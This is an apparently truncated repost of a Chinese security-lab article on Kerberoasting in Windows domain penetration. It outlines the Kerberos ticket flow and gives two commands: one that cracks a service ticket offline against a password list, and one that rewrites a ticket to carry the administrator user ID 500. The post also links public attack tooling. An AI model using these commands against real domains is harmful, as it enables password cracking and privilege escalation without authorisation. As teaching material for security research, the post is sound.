声明
0x01 前言
0x02 Kerberoasting
-
Client想要访问Server的服务时,先要向AS发送能够证明自己身份的验证 -
验证通过后AS会给Client发送一个TGT -
随后Client再向TGS去验证自己的身份通过后 -
TGS会给Client发送一个ST -
最后是Client和Server做双向验证
python3 tgsrepcrack.py password.txt god.kirbi
0x03票据重写
Python3 kerberoast.py -p Password -r 001.kirbi -w 002.kirbi -u 500
0x04总结
-
https://github.com/xan7r/kerberoast
-
https://github.com/PowerShellMafia/PowerSploit/
▇ 扫码关注我们 ▇
长白山攻防实验室
学习最新技术知识
原文始发于微信公众号(长白山攻防实验室):Kerberoasting——域渗透
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论